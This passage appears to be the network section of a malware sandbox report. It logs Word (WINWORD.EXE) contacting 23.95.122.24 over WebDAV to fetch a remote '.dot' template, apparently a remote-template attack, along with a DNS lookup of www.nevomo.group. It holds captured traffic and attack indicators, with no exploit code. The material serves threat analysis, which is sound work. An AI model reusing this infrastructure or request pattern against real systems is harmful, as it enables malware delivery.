Apr 8, 2021 13:18:03.405373096 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405411959 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405467987 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405478954 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405518055 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405531883 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405566931 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405581951 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405630112 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405632973 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405668020 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405677080 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405714035 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405721903 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405770063 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405774117 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405814886 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405826092 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405874968 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405884027 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405925035 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405931950 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405982018 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406018972 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406028032 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406039000 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406090021 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406092882 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406141996 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406146049 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406188965 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406191111 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406236887 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406240940 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406287909 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406296968 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406342983 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406348944 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406408072 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406414986 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406462908 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406471014 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406521082 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406524897 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406578064 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406590939 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406641960 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406646967 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406699896 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406701088 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406744003 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406761885 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406810045 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406811953 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406858921 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406861067 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406908035 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.406938076 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406955957 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.406966925 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407021046 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407022953 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407061100 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407071114 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407100916 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407115936 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407150984 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407154083 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407206059 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407227993 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407259941 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407298088 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407305002 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407324076 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407352924 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407355070 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407392025 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407406092 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407430887 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407435894 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407469988 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407484055 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407526016 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407531977 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407577038 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407581091 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407629013 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407630920 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407679081 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407680988 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407721996 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407728910 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407758951 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407768965 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407799959 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407814980 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407838106 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407850981 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407885075 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407900095 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407943964 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.407953024 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.407991886 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.408019066 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.408041954 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.408045053 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.408098936 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.408102989 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.408148050 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.520703077 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.520757914 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.520797968 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.520834923 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.520872116 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.520910978 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.520960093 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.520970106 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521018982 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521058083 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521059990 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521099091 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521132946 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521136999 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521174908 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521212101 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521217108 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521253109 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521267891 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521302938 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521332026 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521348000 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521416903 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521454096 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521456003 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521467924 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521496058 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521503925 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521537066 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521567106 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521575928 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521615982 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521621943 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521667957 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521697998 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521718979 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521764040 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521820068 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521843910 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521884918 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521923065 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.521929026 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.521981955 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.522006989 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.522039890 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.522074938 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.522089005 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.522125959 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.522133112 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.522173882 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.522182941 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.522248983 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.522735119 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.526593924 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.526637077 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.526695013 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.526737928 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.526766062 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.526776075 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.526819944 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.526850939 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.526890039 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:04.151460886 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:05.495172024 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:05.619119883 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:05.619648933 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:05.745157957 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:05.960220098 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:07.289583921 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:07.289704084 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:09.682003975 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:09.805407047 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:09.805866957 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:09.930573940 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:10.141444921 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:15.462034941 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:15.462212086 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:15.462289095 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:15.584578991 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:19:43.578321934 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:44.124061108 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:44.826191902 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:46.121017933 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:48.523622036 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:53.422492027 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:56.965459108 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:57.084084034 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:19:57.084189892 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:57.084356070 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:57.206953049 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:19:57.207365990 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:57.328922987 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:19:57.603636980 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:19:57.695388079 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:19:57.695478916 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:00.985137939 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:01.105123997 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:20:01.105659962 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:01.228305101 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:20:01.503974915 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:01.586461067 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:20:01.586894989 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:03.032876968 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:03.142019987 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:03.261605978 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:20:03.262105942 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:03.383797884 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:20:03.594670057 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:03.679924011 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:20:03.680053949 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:07.343851089 CEST	49173	80	192.168.2.22	213.186.33.5
Apr 8, 2021 13:20:07.372982979 CEST	80	49173	213.186.33.5	192.168.2.22
Apr 8, 2021 13:20:07.373060942 CEST	49173	80	192.168.2.22	213.186.33.5
Apr 8, 2021 13:20:07.373276949 CEST	49173	80	192.168.2.22	213.186.33.5
Apr 8, 2021 13:20:07.402926922 CEST	80	49173	213.186.33.5	192.168.2.22
Apr 8, 2021 13:20:07.403136969 CEST	49173	80	192.168.2.22	213.186.33.5
Apr 8, 2021 13:20:07.403198957 CEST	49173	80	192.168.2.22	213.186.33.5
Apr 8, 2021 13:20:07.432492971 CEST	80	49173	213.186.33.5	192.168.2.22
Apr 8, 2021 13:20:08.899054050 CEST	80	49172	23.95.122.24	192.168.2.22
Apr 8, 2021 13:20:08.899127007 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:08.899178982 CEST	49172	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:20:09.021637917 CEST	80	49172	23.95.122.24	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 13:20:07.294760942 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 8, 2021 13:20:07.333528996 CEST	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 13:20:07.294760942 CEST	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.nevomo.group	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 13:20:07.333528996 CEST	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.nevomo.group		213.186.33.5	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

23.95.122.24

www.nevomo.group

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	23.95.122.24	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:17:52.950525999 CEST	0	OUT	OPTIONS /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 23.95.122.24 Content-Length: 0 Connection: Keep-Alive
Apr 8, 2021 13:17:53.077128887 CEST	0	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:17:54 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: httpd/unix-directory

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	23.95.122.24	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:17:53.729588985 CEST	1	OUT	HEAD /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 23.95.122.24
Apr 8, 2021 13:17:53.847738981 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:17:54 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Wed, 07 Apr 2021 18:00:13 GMT ETag: "3263-5bf65b3dc8631" Accept-Ranges: bytes Content-Length: 12899 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	23.95.122.24	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:17:58.032867908 CEST	2	OUT	OPTIONS /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 23.95.122.24
Apr 8, 2021 13:17:58.159369946 CEST	2	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 08 Apr 2021 11:17:59 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Location: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ Content-Length: 389 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 32 2e 32 34 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/">here</a>.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
Apr 8, 2021 13:17:58.160533905 CEST	3	OUT	OPTIONS /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 23.95.122.24
Apr 8, 2021 13:17:58.296209097 CEST	3	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 11:17:59 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Allow: OPTIONS,HEAD,GET,POST,TRACE Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: httpd/unix-directory
Apr 8, 2021 13:17:59.540071011 CEST	4	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e Data Ascii: PROPFIND /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 23.95.122.24
Apr 8, 2021 13:17:59.662621975 CEST	4	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 08 Apr 2021 11:18:00 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Location: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ Content-Length: 389 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 32 2e 32 34 2f 2e 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 2d 2e 5f 2d 2d 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 5f 2d 2d 2d 2d 2d 2d 2d 2e 2e 2e 2e 2d 2e 2d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 